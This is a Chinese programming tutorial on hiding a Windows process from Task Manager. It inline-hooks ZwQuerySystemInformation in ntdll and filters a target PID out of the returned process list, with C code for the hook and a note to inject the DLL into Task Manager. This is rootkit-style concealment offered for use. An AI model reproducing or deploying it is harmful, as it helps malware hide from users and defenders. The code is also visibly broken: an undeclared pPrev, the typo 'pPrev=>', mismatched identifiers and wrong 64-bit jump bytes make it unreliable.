Java教程

进程隐藏之API HOOK

本文主要是介绍进程隐藏之API HOOK,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
// 在Windows中,用户进程的所有操作都是基于WIN32 API来实现的,例如使用任务管理器来查看进程等操作。
// API HOOK技术是一种改变API执行结果的技术。

// PS:ZwQuerySystemInformation函数:
// 功能:获取指定的系统信息。
// 原型:NTSTASTUS WINAPI ZwQuerySystemInformation (
//          _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
//          _Inout_ PVOID SystemInformaion,
//          _In_ ULONG SystemInformationLength,
//          _Out_opt_ PULONG ReturnLength
//       )
// 参数:SystemInformationClass:要检索系统的信息类型,比如检索进程信息,使用SystemProcessInformation(枚举值为5)。
//       SystemInformation:缓存区,用于接收请求的信息,缓存区的大小和结构取决于SystemInformationClass参数。
//       SystemInformationLength:缓存区大小。
//       ReturnLength:获取函数写入信息的实际大小。
// 结果:成功,返回STATUS_SUCCESS,失败,返回NTSTATUS错误码。

// PS:利用ZwQuerySystemInformation实现进程隐藏的原理:
//     遍历进程使用的EnumProcess和CreateToolhelp32Snapshot函数,其底层都是利用ZwQuerySystemInformation,设置标志位SystemProcessInformation
//     来查询进程信息的。所以,可以利用inline hook技术通过修改ZwQuerySystemInformation入口地址,让其指向自定义的New_ZwQuerySystemInformation函数,
//     在该函数内部调用ZwQuerySystemInformation,如果是查询进程并且进程ID与目标隐藏进程的ID相同,则可以过滤掉该进程的信息,从而实现进程隐藏。

// PS:INLINE HOOK技术:
// inline hook API的核心原理是在获取进程中指定API函数的地址后,修改该API的入口函数地址的前几个字节数据,写入一个跳转指令,使其跳转到自定义的新函数中去执行。

// PS:区分32位系统和64位系统,因为32位系统和64位指针长度是不一样的,这导致地址长度也不同。32位系统中用4个字节表示地址,64位系统中用8个字节表示地址。

// 在32位系统中,汇编跳转语句可写为:jmp _dwNewAddress,对应的机器码为:e9 _dwOffset(跳转偏移,使用相对地址) _dwOffset = _dwNewAddress - _dwAddress。
// 在64位系统中,汇编跳转语句可谢伟:mov rax, _ullNewAddress(长地址,使用绝对地址) jmp rax,对应的机器码为:48 b4 _ullNewAddress

// 所以,要想进行inline hook,32位系统需要更改函数的前5个字节数据;64位系统,需要更改前12个字节数据。

// PS:inline hook的具体流程:
//     1.首先,先获取API函数的地址。可以从进程中获取HOOK API对应的模块地址(使用GetModuleHandle函数),然后,通过GetProcAddress获取API函数在进程中的地址。
//     2.然后,根据32位和64位版本,计算需要修改HOOK API函数的前几个字节数据。若是32位系统,则需要计算跳转偏移,并修改函数的前5个字节数据,
//       若是64位系统,则需要修改函数的前12字节数据。
//     3.接着,修改API函数的前几个字节数据的页面保护属性,更改为可读、可写、可执行,这样是为了确保修改后内存能够执行。
//     4.最后,为了能够还原操作,要在修改数据前先对数据进行备份,然后再修改数据,并还原页面保护属性。

// PS:UNHOOK和HOOK的流程是一样,唯一区别是UNHOOK写入的数据是HOOK操作备份的前几个字节数据。这样,API函数便可恢复正常。

// 示例代码:

void HookApi()
{
    // 获取ntdll.dll的加载基址,若没有则返回
    HMODULE hDll = ::GetModuleHandle("ntdll.dll");
    if (NULL == hDll)
        return ;

    // 获取ZwQuerySystemInformation函数地址
    typedef_ZwQuerySystemInformation ZwQuerySystemInformation = (typedef_ZwQuerySystemInformation)::GetProcAddress(hDll, "ZwQuerySystemInformation");
    if (NULL == zwQuerySystemInformation)
        return ;

    // 32为系统修改前5个字节,64位系统修改前12个字节
    #ifndef _WIN64
        BYTE pData[5] = {0xe9, 0, 0, 0, 0};
        DWORD dwOffset = (DWORD)New_ZwQuerySystemInformation - (DWORD)ZwQuerySystemInformation - 5;
        ::RtlCopyMemory(&pData[1], &dwOffset, sizeof(dwOffset));
        // 保存前5个字节数据
        ::RtlCopyMemory(g_OldData32, ZwQuerySystemInformation, sizeof(pData));
    #else
        BYTE pData[12] = {0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0x0};
        ULONGLONG ullOffset = (ULONGLONG)New_ZwQuerySystemInformation;
        ::RtlCopyMemory(&pData[2], &ullOffset, sizeof(ullOffset));
        // 保存前12个字节
        ::RtlCopyMemory(g_OldData64, ZwQuerySystemInformation, sizeof(pData));
    #endif

    // 设置页面的保护属性为可读、可写、可执行
    DWORD dwOldProctect = 0;
    ::VirtualProtect(ZwQuerySystemInformation, sizeof(pData), PAGE_EXECUTE_READWRITE, &dwOldProtect);

    // 修改
    ::RtlCopyMemory(ZwQuerySystemInformation, pData, sizeof(pData));

    // 还原页面保护属性
    ::VirtualProtect(ZwQuerySytemInformation, sizeof(pData), dwOldProtect, &dwOldProtect);
}

// PS:ZwQuerySystemInformation HOOK函数:

// 示例代码

NTSTATUS WINAPI New_ZwQuerySystemInformation(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength )
{
    NTSTATUS status = STATUS_SUCCESS;
    PSYSTEM_PROCESS_INFORMATION pCur = NULL;

    // 要隐藏的进程PID
    DWORD dwHideProcessId = 1224;

    // UNHOOK API
    UnhookApi();

    // 获取ntdll.dll模块
    HMODULE hDll = ::GetModuleHandle("ntdll.dll");
    if (NULL == hDll)
        return status;

    // 获取ZwQuerySystemInformation函数地址
    typedef_ZwQuerySystemInformation ZwQuerySystemInformation = (typedef_ZwQuerySystemInformation)::GetProcAddress(hDll, "ZwQuerySystemInformation");
    if (NULL == ZwQuerySystemInformation)
        return status;

    // 调用原函数ZwQuerySystemInformation
    status = ZwQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);

    // 判断是否是进程遍历
    if (NT_SUCCESS(status) && (5 == SystemInformationClass))
    {
        pCur = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
        
        // 遍历,剔除隐藏进程的信息
        while (TRUE)
        {
            // 判断是否是要隐藏的进程PID
            if (dwHideProcessId == (DWORD)pCur->UniqueProcessId)
            {
                if (0 == pCur->NextEntryOffset)
                {
                    // 末尾元素
                    pPrev->NextEntryOffset = 0;
                }
                else
                {
                    pPrev->NextEntryOffset = pPrev=>NextEntryOffset + pCur->NextEntryOffset;
                }
            }
            else 
            {
                pPrev = pCur;
            }
            
            // 退出条件
            if (0 == pCur->NextEntryOffset)
                break;

            pCur = (PSYSTEM_PROCESS_INFORMATION)((PBYTE*)pCur + pCur->NextEntryOffset);
        }
    }

    // HOOK Api
    HookApi();

    return status;
}

// PS:以上的代码需写入DLL文件,注入到要遍历进程的程序中,比如任务管理器,才能够实现进程隐藏。


这篇关于进程隐藏之API HOOK的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!